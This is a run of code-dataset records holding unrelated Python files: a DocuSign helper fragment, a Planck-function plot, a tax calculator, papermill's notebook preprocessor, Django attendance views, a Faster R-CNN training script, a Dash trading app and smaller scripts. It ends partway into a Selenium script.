self.get_bank_draft_info().get('bank_name', '')\n\n def get_address_one(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('address_one', '')\n\n def get_address_two(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('address_two', '')\n\n def get_billing_city(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_city', '')\n\n def get_billing_state(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_state', '')\n\n def get_billing_zip(self):\n if not self.has_bank_draft_info():\n return\n return self.get_bank_draft_info().get('billing_zip', '')\n\n # def get_case_riders(self):\n # #\n # if not self.case.product_settings:\n # return []\n #\n # product_settings = json.loads(self.case.product_settings)\n # rider_settings = product_settings.get('riders', [])\n\n def did_finish_signing_in_wizard(self):\n return self.did_employee_sign_in_wizard() and self.did_agent_sign_in_wizard()\n\n def did_employee_sign_in_wizard(self):\n return self.data.get('applicant_signed')\n \n def did_agent_sign_in_wizard(self):\n return self.data.get('agent_signed')\n\n# For employee signing sessions\ndef build_callback_url(wizard_data, session_type):\n is_ssl = app.config.get('IS_SSL', True)\n hostname = app.config.get('HOSTNAME', '5starenroll.com')\n scheme = 'https://' if is_ssl else 'http://'\n # note: DS supplies the last parm of 'event' in the callback\n return (u'{scheme}{hostname}/application_completed'\n '?name={name}&type={session_type}'.format(\n scheme=scheme,\n hostname=hostname,\n name=wizard_data['employee']['first'],\n session_type=session_type,\n ))\n\n\ndef build_callcenter_callback_url(case):\n is_ssl = app.config.get('IS_SSL', True)\n hostname = app.config.get('HOSTNAME', '5starenroll.com')\n scheme = 'https://' if is_ssl else 'http://'\n # note: DS supplies the last parm of 'event' in the callback\n return (u'{scheme}{hostname}/enrollment-case/{case_id}#enrollment'.format(\n scheme=scheme,\n hostname=hostname,\n case_id=case.id,\n ))\n","sub_path":"taa/services/docusign/docusign_envelope.py","file_name":"docusign_envelope.py","file_ext":"py","file_size_in_byte":31361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8697571","text":"from numpy import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'sherif'})\n\ntable5 = loadtxt(\"solspect.dat\")\n\nwav = table5[:,0]\nfw = table5[:,1]\nfw_cont = table5[:,2]\niw = table5[:,3]\niw_cont = table5[:,4]\n\nc =2.99792458e10\nk = 1.38065e-16\nh = 6.6261e-27\n\"\"\"\nplt.plot(wav, fw, label = \"fw\")\nplt.plot(wav, fw_cont, label = \"fw_cont\")\nplt.plot(wav, iw, label = \"iw\")\nplt.plot(wav, iw_cont, label = \"iw_cont\")\nplt.legend(loc= \"best\")\nplt.xlabel('Wavelength')\nplt.ylabel('Flux and intensities per wavelength')\n\nprint 'max(Ic)= ', max(iw_cont), 'at', wav[where(iw_cont == max(iw_cont))]\n\n#Conversion to values per frequency\n\nper = wav**2./c #conversion factor\nfv = fw*per\nfv_cont = fw_cont*per\niv = iw*per\niv_cont = iw_cont*per\n\nplt.plot(wav, fv, label = \"fv\")\nplt.plot(wav, fv_cont, label = \"fv_cont\")\nplt.plot(wav, iv, label = \"iv\")\nplt.plot(wav, iv_cont, label = \"iv_cont\")\nplt.legend(loc= \"best\")\nplt.xlabel('Wavelength')\nplt.ylabel('Flux and intensities per frequency')\n\nfor i in range(len(wav)):\n if wav[i] == 0.80:\n print iv_cont[i]\n\"\"\"\n#Planck function\ndef planck(T, wav):\n return ((2.*h*c**2)/wav**5)*1./(exp( h*c/(wav*k*T))-1.)\n\nB = zeros(shape(wav))\nfor T in range(6500, 6000-1, -200):\n B[:] = planck(T, wav[:]*1e-4)\n plt.plot(wav, B, label= \"T=\" +str(T))\n plt.legend(loc=\"best\")\n\n \nplt.plot(wav, iw_cont*1e14, label = \"iw_cont\")\n#plt.plot(wav, planck(6000, wav))\nplt.title('Planck funcktion')\nplt.xlabel('Wavelength')\nplt.ylabel('Intensity')\nplt.legend(loc=\"best\")\n\"\"\"\ndef invert_p(iw_cont, wav):\n return h*c/(wav*1e-4*k)*1./log(2.*h*c**2/((wav*1e-4)**5*iw_cont*1e14)+1.)\n \nTb = invert_p(iw_cont, wav)\nplt.plot(wav, Tb)\nplt.ylabel('Brightness temperature')\nplt.xlabel('Wavelength')\n\n#plt.yscale('log')\n#plt.xscale('log')\n\"\"\"\nplt.show()\n","sub_path":"ssb21.py","file_name":"ssb21.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424605048","text":"#!/usr/bin/env python3\nimport sys\ndef calsal(presalary):\n insurance = presalary * 0.165\n rest = presalary - insurance - 3500\n\n if rest <= 0:\n return presalary - insurance\n elif rest <= 1500:\n tax = rest * 0.03 - 0\n elif rest > 1500 and rest <= 4500:\n tax = rest * 0.10 - 105\n elif rest > 4500 and rest <= 9000:\n tax = rest * 0.20 - 555\n elif rest > 9000 and rest <= 35000:\n tax = rest * 0.25 - 1005\n elif rest > 35000 and rest <= 55000:\n tax = rest * 0.30 - 2755\n elif rest > 55000 and rest <= 80000:\n tax = rest * 0.35 - 5505\n else:\n tax = rest * 0.45 - 13505\n return presalary - insurance - tax\n\nif __name__ == '__main__':\n wlist = sys.argv[1:]\n for worker in wlist:\n try:\n id = int(worker.split(':')[0])\n presalary = int(worker.split(':')[1])\n except:\n print(\"Parameter Error\")\n exit(1)\n print(str(id) + ':' + format(calsal(presalary), \".2f\"))\n","sub_path":"w1/cal-v2/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614638738","text":"from __future__ import unicode_literals, print_function\n\nimport datetime\nimport sys\n\nfrom concurrent import futures\nfrom nbconvert.preprocessors import ExecutePreprocessor\nfrom nbconvert.preprocessors.execute import CellExecutionError\nfrom nbformat.v4 import output_from_msg\n\nfrom .iorw import write_ipynb\n\ntry:\n from queue import Empty # Py 3\nexcept ImportError:\n from Queue import Empty # Py 2\n\n# tqdm creates 2 globals lock which raise OSException if the execution\n# environment does not have shared memory for processes, e.g. AWS Lambda\ntry:\n from tqdm import tqdm\n\n no_tqdm = False\nexcept OSError:\n no_tqdm = True\n\nPENDING = \"pending\"\nRUNNING = \"running\"\nCOMPLETED = \"completed\"\n\n\ndef log_output(output):\n if output.output_type == \"stream\":\n if output.name == \"stdout\":\n sys.stdout.write(\"\".join(output.text))\n elif output.name == \"stderr\":\n sys.stderr.write(\"\".join(output.text))\n elif \"data\" in output and \"text/plain\" in output.data:\n sys.stdout.write(\"\".join(output.data['text/plain']) + \"\\n\")\n # Force a flush to avoid long python buffering for messages\n sys.stdout.flush()\n sys.stderr.flush()\n\n\nclass PapermillExecutePreprocessor(ExecutePreprocessor):\n \"\"\"Module containing a preprocessor that executes the code cells\n and updates outputs\"\"\"\n\n # Copyright (c) IPython Development Team.\n # Distributed under the terms of the Modified BSD License.\n\n # TODO: Delete this wrapper when nbconvert allows for setting preprocessor\n # hood in a more convienent manner\n\n def preprocess(self, nb, resources):\n \"\"\"\n Copied with one edit of super -> papermill_preprocessor from nbconvert\n\n Preprocess notebook executing each code cell.\n\n The input argument `nb` is modified in-place.\n\n Parameters\n ----------\n nb : NotebookNode\n Notebook being executed.\n resources : dictionary\n Additional resources used in the conversion process. For example,\n passing ``{'metadata': {'path': run_path}}`` sets the\n execution path to ``run_path``.\n\n Returns\n -------\n nb : NotebookNode\n The executed notebook.\n resources : dictionary\n Additional resources used in the conversion process.\n \"\"\"\n path = resources.get('metadata', {}).get('path') or None\n\n # clear display_id map\n self._display_id_map = {}\n\n kernel_name = nb.metadata.get('kernelspec', {}).get('name', 'python')\n if self.kernel_name:\n kernel_name = self.kernel_name\n self.log.info(\"Executing notebook with kernel: %s\" % kernel_name)\n self.km, self.kc = self.start_new_kernel(\n startup_timeout=self.startup_timeout,\n kernel_name=kernel_name,\n extra_arguments=self.extra_arguments,\n cwd=path,\n )\n self.kc.allow_stdin = False\n # Parent class requires self.nb to be present temporarily during preproc\n self.nb = nb\n\n try:\n nb, resources = self.papermill_preprocess(nb, resources)\n finally:\n self.kc.stop_channels()\n self.km.shutdown_kernel(now=self.shutdown_kernel == 'immediate')\n # Parent class required self.nb be removed after preproc\n delattr(self, 'nb')\n\n return nb, resources\n\n def start_new_kernel(self, startup_timeout=60, kernel_name='python', **kwargs):\n km = self.kernel_manager_class(kernel_name=kernel_name)\n km.start_kernel(**kwargs)\n kc = km.client()\n kc.start_channels()\n try:\n kc.wait_for_ready(timeout=startup_timeout)\n except RuntimeError:\n kc.stop_channels()\n km.shutdown_kernel()\n raise\n\n return km, kc\n\n def papermill_preprocess(self, nb, resources):\n \"\"\"\n This function acts as a replacement for the grandparent's `preprocess`\n method.\n\n We are doing this for the following reasons:\n\n 1. Notebooks will stop executing when they encounter a failure but not\n raise a `CellException`. This allows us to save the notebook with the\n traceback even though a `CellExecutionError` was encountered.\n\n 2. We want to write the notebook as cells are executed. We inject our\n logic for that here.\n\n 3. We want to include timing and execution status information with the\n metadata of each cell.\n\n Parameters\n ----------\n nb : NotebookNode\n Notebook being converted\n resources : dictionary\n Additional resources used in the conversion process. Allows\n preprocessors to pass variables into the Jinja engine.\n\n \"\"\"\n output_path = nb.metadata.papermill['output_path']\n\n # Reset the notebook.\n for cell in nb.cells:\n # Reset the cell execution counts.\n if cell.get(\"execution_count\") is not None:\n cell.execution_count = None\n\n # Clear out the papermill metadata for each cell.\n cell.metadata['papermill'] = dict(\n exception=None,\n start_time=None,\n end_time=None,\n duration=None,\n status=PENDING, # pending, running, completed\n )\n if cell.get(\"outputs\") is not None:\n cell.outputs = []\n\n # Execute each cell and update the output in real time.\n with futures.ThreadPoolExecutor(max_workers=1) as executor:\n\n # Generate the iterator\n if self.progress_bar and not no_tqdm:\n bar_format = \"{l_bar}{bar}{r_bar}\"\n if self.log_output:\n # We want to inject newlines if we're printing content between enumerations\n bar_format += \"\\n\"\n execution_iterator = tqdm(\n enumerate(nb.cells), total=len(nb.cells), bar_format=bar_format\n )\n else:\n execution_iterator = enumerate(nb.cells)\n\n for index, cell in execution_iterator:\n cell.metadata[\"papermill\"][\"status\"] = RUNNING\n future = executor.submit(write_ipynb, nb, output_path)\n t0 = datetime.datetime.utcnow()\n try:\n if not cell.source:\n continue\n\n nb.cells[index], resources = self.preprocess_cell(cell, resources, index)\n cell.metadata['papermill']['exception'] = False\n\n except CellExecutionError:\n cell.metadata['papermill']['exception'] = True\n break\n finally:\n t1 = datetime.datetime.utcnow()\n cell.metadata['papermill']['start_time'] = t0.isoformat()\n cell.metadata['papermill']['end_time'] = t1.isoformat()\n cell.metadata['papermill']['duration'] = (t1 - t0).total_seconds()\n cell.metadata['papermill']['status'] = COMPLETED\n future.result()\n return nb, resources\n\n def run_cell(self, cell, cell_index=0):\n msg_id = self.kc.execute(cell.source)\n self.log.debug(\"Executing cell:\\n%s\", cell.source)\n outs = cell.outputs = []\n\n while True:\n try:\n # We are not waiting for execute_reply, so all output\n # will not be waiting for us. This may produce currently unknown issues.\n msg = self.kc.iopub_channel.get_msg(timeout=None)\n except Empty:\n self.log.warning(\"Timeout waiting for IOPub output\")\n if self.raise_on_iopub_timeout:\n raise RuntimeError(\"Timeout waiting for IOPub output\")\n else:\n break\n if msg['parent_header'].get('msg_id') != msg_id:\n # not an output from our execution\n continue\n\n msg_type = msg['msg_type']\n self.log.debug(\"output: %s\", msg_type)\n content = msg['content']\n\n # set the prompt number for the input and the output\n if 'execution_count' in content:\n cell['execution_count'] = content['execution_count']\n\n if msg_type == 'status':\n if content['execution_state'] == 'idle':\n break\n else:\n continue\n elif msg_type == 'execute_input':\n if self.log_output:\n sys.stdout.write(\n 'Executing Cell {:-<40}\\n'.format(content.get(\"execution_count\", \"*\"))\n )\n continue\n elif msg_type == 'clear_output':\n outs[:] = []\n # clear display_id mapping for this cell\n for display_id, cell_map in self._display_id_map.items():\n if cell_index in cell_map:\n cell_map[cell_index] = []\n continue\n elif msg_type.startswith('comm'):\n continue\n\n display_id = None\n if msg_type in {'execute_result', 'display_data', 'update_display_data'}:\n display_id = msg['content'].get('transient', {}).get('display_id', None)\n if display_id:\n self._update_display_id(display_id, msg)\n if msg_type == 'update_display_data':\n # update_display_data doesn't get recorded\n continue\n\n try:\n out = output_from_msg(msg)\n except ValueError:\n self.log.error(\"unhandled iopub msg: \" + msg_type)\n continue\n if display_id:\n cell_map = self._display_id_map.setdefault(display_id, {})\n output_idx_list = cell_map.setdefault(cell_index, [])\n output_idx_list.append(len(outs))\n\n if self.log_output:\n log_output(out)\n outs.append(out)\n\n exec_reply = self._wait_for_reply(msg_id, cell)\n if self.log_output:\n sys.stdout.write(\n 'Ending Cell {:-<43}\\n'.format(\n exec_reply.get(\"content\", {}).get(\"execution_count\", content)\n )\n )\n # Ensure our last cell messages are not buffered by python\n sys.stdout.flush()\n\n return exec_reply, outs\n","sub_path":"papermill/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91862561","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport json\nfrom.models import *\nfrom django.core.serializers import serialize\nfrom datetime import datetime\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef attendance(request):\n if request.method == 'POST':\n byte_data = request.body\n # print(byte_data)\n id = byte_data[:11].decode('utf-8')\n user = User.objects.filter(user_id=id).exists()\n # 如果查询到有结果,则记录到Record里\n if user:\n user = User.objects.first()\n now = datetime.now()\n date_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n Record.objects.create(item_name=user.user_name, item_id=user.user_id, item_date=date_time, item_create_date= now)\n response = '000'\n else:\n response = '001'\n return HttpResponse(response)\n\n response = '000'\n return HttpResponse(response)\n\n\n'''\n item_num = models.AutoField(primary_key=True)\n item_name = models.CharField(max_length=20)\n item_id = models.CharField(max_length=50)\n item_date = models.DateTimeField(auto_now_add=True)\n\n'''\n\ndef timelist(request):\n cli_request = json.loads(request.body)\n try:\n pageinfo = cli_request['pageinfo']\n print(pageinfo)\n except Exception:\n print(\"argument error\")\n\n # 创建分页器\n\n records = []\n total = Record.objects.count()\n if total > 0:\n datas = Record.objects.all().order_by('-item_date')\n paginator = Paginator(datas, pageinfo['pagesize'])\n # datas = paginator.get_page(pageinfo['currentpage'])\n datas = []\n try:\n datas = paginator.page(pageinfo['currentpage'])\n print(datas)\n except Exception as error:\n print(f\"page error:{error}\")\n\n for data in datas:\n record = {\"id\": data.item_id, \"name\": data.item_name, \"date\": data.item_date}\n records.append(record)\n\n return JsonResponse({\"timeList\":records, \"total\":total}, safe=False)\n\n\n\n","sub_path":"AttendanceSystem/server/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11702947","text":"if __name__ == '__main__' and __package__ is None:\n from os import sys, path\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nimport arrow\nimport knack_helpers\nimport data_helpers\nimport secrets\nimport pdb\n\n\n# KNACK CONFIG\nREFERENCE_OBJECT = 'object_27'\nPRIMARY_KEY = 'ATD_EVAL_ID'\nSTATUS_KEY = 'EVAL_STATUS'\nGROUP_KEY = 'YR_MO_RND'\nSCORE_KEY = 'EVAL_SCORE'\nCONCAT_KEYS = ['RANK_ROUND_MO', 'RANK_ROUND_YR']\nRANK_KEY = 'EVAL_RANK'\n\nKNACK_PARAMS = { \n 'REFERENCE_OBJECTS' : [REFERENCE_OBJECT],\n 'FIELD_NAMES' : [PRIMARY_KEY, RANK_KEY, STATUS_KEY, SCORE_KEY, 'RANK_ROUND_MO', 'RANK_ROUND_YR', 'EXCLUDE_FROM_RANKING'],\n 'APPLICATION_ID' : secrets.KNACK_CREDENTIALS['APP_ID'],\n 'API_KEY' : secrets.KNACK_CREDENTIALS['API_KEY']\n}\n\nnow = arrow.now()\n\ndef main(date_time):\n\n try: \n field_dict = knack_helpers.get_fields( KNACK_PARAMS )\n\n field_lookup = knack_helpers.create_field_lookup(field_dict, parse_raw=True)\n\n knack_data = knack_helpers.get_object_data( REFERENCE_OBJECT, KNACK_PARAMS )\n\n knack_data = knack_helpers.parse_data(knack_data, field_dict, KNACK_PARAMS, include_ids=True)\n\n knack_data = data_helpers.filter_by_key(knack_data, STATUS_KEY, ['NEW', 'IN PROGRESS', 'COMPLETED'])\n\n knack_data = data_helpers.add_missing_keys(knack_data, [SCORE_KEY], ['0'])\n\n knack_data = data_helpers.concat_key_values(knack_data, CONCAT_KEYS, GROUP_KEY, '_')\n \n knack_data_exclude = [record for record in knack_data if record['EXCLUDE_FROM_RANKING'] == True]\n\n knack_data_include = [record for record in knack_data if record['EXCLUDE_FROM_RANKING'] == False]\n\n # create list of scores grouped by group key\n # scores are converted to integers\n score_dict = {}\n\n for row in knack_data_include:\n key = row[GROUP_KEY]\n score = int( row[SCORE_KEY] )\n\n if key not in score_dict:\n score_dict[key] = []\n\n score_dict[key].append(score)\n\n # reverse sort lists of scores\n for key in score_dict:\n score_dict[key].sort()\n score_dict[key].reverse()\n\n # get score rank and append record to payload\n payload = []\n\n for record in knack_data_include:\n score = int( record[SCORE_KEY] )\n key = record[GROUP_KEY]\n rank = data_helpers.min_index(score_dict[key], score) + 1 # add one to score index, because list indices start at 0\n \n if RANK_KEY in record:\n if record[RANK_KEY] != rank:\n record[RANK_KEY] = rank\n payload.append(record)\n\n else:\n record[RANK_KEY] = rank\n payload.append(record)\n\n # assign null ranks to records flagged as exclude from ranking\n for record in knack_data_exclude:\n\n if RANK_KEY in record:\n # updated excluded records if rank found\n if record[RANK_KEY] != '':\n record[RANK_KEY] = ''\n payload.append(record)\n\n # parse data to core fields\n payload = data_helpers.reduce_dicts(payload, [RANK_KEY, 'KNACK_ID'])\n\n # replace data keys with knack field names\n payload = data_helpers.replace_keys(payload, field_lookup)\n\n update_response = []\n\n # update knack records\n count = 0\n for record in payload:\n count += 1\n print( 'updating record {} of {}'.format( count, len(payload) ) )\n \n response_json = knack_helpers.update_record(record, KNACK_PARAMS)\n\n update_response.append(response_json)\n\n return update_response\n \n except Exception as e:\n print('Failed to process data for {}'.format(date_time))\n print(e)\n raise e\n\n\nr = main(now)\n\nprint('Donezo!')","sub_path":"traff_sig_req_rank.py","file_name":"traff_sig_req_rank.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102918992","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport logging\nimport uuid\n\nfrom osc_lib.command import command\nfrom osc_lib.i18n import _\n\nfrom tripleoclient import utils\nfrom tripleoclient.workflows import deployment\nfrom tripleoclient.workflows import plan_management\n\n\nclass ListPlans(command.Lister):\n \"\"\"List overcloud deployment plans.\"\"\"\n\n log = logging.getLogger(__name__ + \".ListPlans\")\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n\n workflow_client = self.app.client_manager.workflow_engine\n execution = workflow_client.action_executions.create(\n 'tripleo.plan.list')\n\n try:\n json_results = json.loads(execution.output)['result']\n except Exception:\n self.log.exception(\"Error parsing JSON %s\", execution.output)\n json_results = []\n\n result = []\n for r in json_results:\n result.append((r,))\n\n return ((\"Plan Name\",), result)\n\n\nclass DeletePlan(command.Command):\n \"\"\"Delete an overcloud deployment plan.\n\n The plan will not be deleted if a stack exists with the same name.\n \"\"\"\n\n log = logging.getLogger(__name__ + \".DeletePlan\")\n\n def get_parser(self, prog_name):\n parser = super(DeletePlan, self).get_parser(prog_name)\n parser.add_argument('plans', metavar='', nargs=\"+\",\n help=_('Name of the plan(s) to delete'))\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n\n workflow_client = self.app.client_manager.workflow_engine\n\n for plan in parsed_args.plans:\n print(\"Deleting plan %s...\" % plan)\n plan_management.delete_deployment_plan(workflow_client,\n container=plan)\n\n\nclass CreatePlan(command.Command):\n \"\"\"Create a deployment plan\"\"\"\n\n log = logging.getLogger(__name__ + \".CreatePlan\")\n\n def get_parser(self, prog_name):\n parser = super(CreatePlan, self).get_parser(prog_name)\n parser.add_argument(\n 'name',\n help=_('The name of the plan, which is used for the object '\n 'storage container, workflow environment and orchestration '\n 'stack names.'))\n parser.add_argument(\n '--templates',\n help=_('The directory containing the Heat templates to deploy. '\n 'If this isn\\'t provided, the templates packaged on the '\n 'Undercloud will be used.'),\n )\n\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n clients = self.app.client_manager\n\n name = parsed_args.name\n\n if parsed_args.templates:\n plan_management.create_plan_from_templates(\n clients, name, parsed_args.templates)\n else:\n plan_management.create_default_plan(\n clients, container=name, queue_name=str(uuid.uuid4()))\n\n\nclass DeployPlan(command.Command):\n \"\"\"Deploy a deployment plan\"\"\"\n\n log = logging.getLogger(__name__ + \".DeployPlan\")\n\n def get_parser(self, prog_name):\n parser = super(DeployPlan, self).get_parser(prog_name)\n parser.add_argument('name', help=_('The name of the plan to deploy.'))\n parser.add_argument('--timeout', '-t', metavar='',\n type=int,\n help=_('Deployment timeout in minutes.'))\n return parser\n\n def take_action(self, parsed_args):\n self.log.debug(\"take_action(%s)\" % parsed_args)\n\n clients = self.app.client_manager\n orchestration_client = clients.orchestration\n stack = utils.get_stack(orchestration_client, parsed_args.name)\n\n print(\"Starting to deploy plan: {}\".format(parsed_args.name))\n deployment.deploy_and_wait(self.log, clients, stack, parsed_args.name,\n self.app_args.verbose_level,\n timeout=parsed_args.timeout)\n","sub_path":"tripleoclient/v1/overcloud_plan.py","file_name":"overcloud_plan.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334476162","text":"import torch\nimport torchvision\nfrom carpk import Carpk\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport time\nimport os\nimport datetime\nfrom engine import train_one_epoch, evaluate\nimport utils\n\nroot_dir = '/alihome/zrg/linjie/dataset'\n\ncarpklotdataset = Carpk(root_dir,\n 'train',\n transform=transforms.ToTensor(),\n imgformat=\"jpg\")\ndata_loader = DataLoader(carpklotdataset,\n batch_size=2,\n shuffle=True,\n num_workers=4,\n collate_fn=utils.collate_fn)\ncarpklotdataset_test = Carpk(root_dir,\n 'test',\n transform=transforms.ToTensor(),\n imgformat=\"jpg\")\ndata_loader_test = DataLoader(carpklotdataset_test,\n batch_size=1,\n shuffle=False,\n collate_fn=utils.collate_fn)\n\nis_resume = True\nresume_path = None\nif is_resume and resume_path:\n model = torchvision.models.detection.fasterrcnn_resnet50_fpn(\n num_classes=2, pretrained=False)\n params = [p for p in model.parameters() if p.requires_grad]\n optimizer = torch.optim.SGD(params,\n lr=0.02,\n momentum=0.9,\n weight_decay=1e-4)\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[8, 11],\n gamma=0.1)\nelse:\n print('Resume training')\n checkpoint = torch.load(resume_path, map_location='cpu')\n model.load_state_dict(checkpoint['model'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\ndevice = torch.device(\"cuda\")\nmodel.to(device)\n# Training\nprint('Start training')\nstart_time = time.time()\nfor epoch in range(10):\n train_one_epoch(model, optimizer, data_loader, device, epoch, 50)\n lr_scheduler.step()\n if True:\n utils.save_on_master(\n {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n }, os.path.join(\"./\", 'model_{}.pth'.format(epoch)))\n\n # evaluate after every epoch\n evaluate(model, data_loader_test, device=device)\n\ntotal_time = time.time() - start_time\ntotal_time_str = str(datetime.timedelta(seconds=int(total_time)))\nprint('Training time {}'.format(total_time_str))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516832587","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nfrom leetcode.Util import ListNode\nfrom leetcode import Util\n\n\nclass Solution:\n def numComponents(self, head: ListNode, g) -> int:\n cur = head\n while cur.val not in g:\n cur = cur.next\n ans = 1\n pre = cur\n cur = cur.next\n while cur:\n if cur.val in g and pre.val not in g:\n ans += 1\n pre = cur\n cur = cur.next\n return ans\n\n\ns = Solution()\nprint(s.numComponents(Util.createListNode([0, 1, 2, 3, 4]), {0, 3, 1, 4}))\n","sub_path":"leetcode/2020/linked-list-components.py","file_name":"linked-list-components.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536022153","text":"# -*- coding: utf-8 -*-\nfrom multiprocessing import Process\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\n\nfrom zvt.charts.dcc_components import get_trader_detail_figures\nfrom zvt.charts.html_components import cls_to_input_list\nfrom zvt.composer import get_trader_classes\nfrom zvt.reader.business_reader import AccountReader, OrderReader\nfrom zvt.trader.examples import CoinTrader\n\n\ndef run_trader(trader):\n trader.run()\n\n\ndef process_run(trader):\n p = Process(target=run_trader, args=(trader,))\n p.start()\n\n\naccount_readers = {}\norder_readers = {}\n\napp = dash.Dash(__name__)\n\n# app.config['suppress_callback_exceptions'] = True\n\ntraders = get_trader_classes()\n\nconstructor_divs, constructor_states = cls_to_input_list(CoinTrader)\n\n\ndef serve_layout():\n layout = html.Div(\n [ # left\n html.Div([html.Div([html.Label('select trader:'),\n dcc.Dropdown(\n id='trader_selector',\n options=[{'label': trader[0], 'value': i} for i, trader in\n enumerate(traders)],\n value=0)\n ]),\n html.Div(id='trader_constructor', children=constructor_divs),\n html.Button('run the trader', id='btn_run_trader', n_clicks_timestamp=0),\n html.Div(id='trader_index', style={'display': 'none'})\n ],\n style={'width': '20%', 'display': 'inline-block'}),\n # right\n html.Div(id='trader_status',\n style={'width': '10%', 'display': 'inline-block'}),\n # right\n html.Div(id='trader_details',\n style={'width': '50%', 'display': 'inline-block'}),\n dcc.Interval(\n id='interval-component',\n interval=10 * 1000, # in milliseconds\n n_intervals=0\n )\n ]\n )\n\n return layout\n\n\napp.layout = serve_layout\n\n\n@app.callback(\n [Output('trader_constructor', 'children'),\n Output('trader_index', 'children')],\n [Input('trader_selector', 'value')])\ndef update_trader_constructor(trader_class_index):\n divs, _ = cls_to_input_list(traders[trader_class_index][1])\n return divs, trader_class_index\n\n\n@app.callback(\n Output('trader_status', 'children'),\n [Input('btn_run_trader', 'n_clicks')],\n constructor_states + [State('trader_index', 'children')])\ndef update_trader_status(n_clicks, security_list, exchanges, codes, start_timestamp, end_timestamp, provider, level,\n trader_name, real_time, kdata_use_begin_time, trader_index):\n if n_clicks and (trader_index is not None):\n if trader_name not in account_readers:\n trader = traders[trader_index][1](security_list, exchanges, codes, start_timestamp, end_timestamp, provider,\n level, trader_name, real_time, kdata_use_begin_time)\n process_run(trader)\n account_readers[trader.trader_name] = AccountReader(trader_names=[trader.trader_name], level=trader.level)\n order_readers[trader.trader_name] = OrderReader(trader_names=[trader.trader_name])\n\n return html.Label('trader is running'.format(trader_name))\n\n return html.Label('trader status')\n\n\n@app.callback(Output('trader_details', 'children'),\n [Input('interval-component', 'n_intervals')],\n [State('trader_name', 'value')])\ndef update_trader_details(n, trader_name):\n if trader_name is not None:\n if trader_name in account_readers:\n account_readers[trader_name].move_on(timeout=1)\n order_readers[trader_name].move_on(timeout=1)\n return get_trader_detail_figures(account_readers[trader_name], order_readers[trader_name])\n return html.Label('trader details')\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"zvt/trader_composer.py","file_name":"trader_composer.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155264848","text":"import random\nimport time\n\ndef ustaw_znak(znak='-'):\n def ramka(funkcja):\n def wrapper():\n print(znak * 35)\n funkcja()\n print(znak * 35)\n\n return wrapper\n return ramka\n\n@ustaw_znak('#')\ndef obliczenia():\n # ta funkcja nie robi nic pożytecznego\n print('liczę', end='')\n for _ in range(5):\n print('.', end='', flush=True)\n time.sleep(0.5)\n print('obliczyłem! wynik to: ', random.randint(10, 100))\n\n\nif __name__ == '__main__':\n obliczenia()\n print() # oddzielenie pustą linią\n obliczenia()\n print()\n obliczenia()\n","sub_path":"Python - advanced/zajecia05/dek_adv.py","file_name":"dek_adv.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"342868545","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nimport time\nimport sys\n\n# Replace below path with the absolute path\n# to chromedriver in your computer\n#driver = 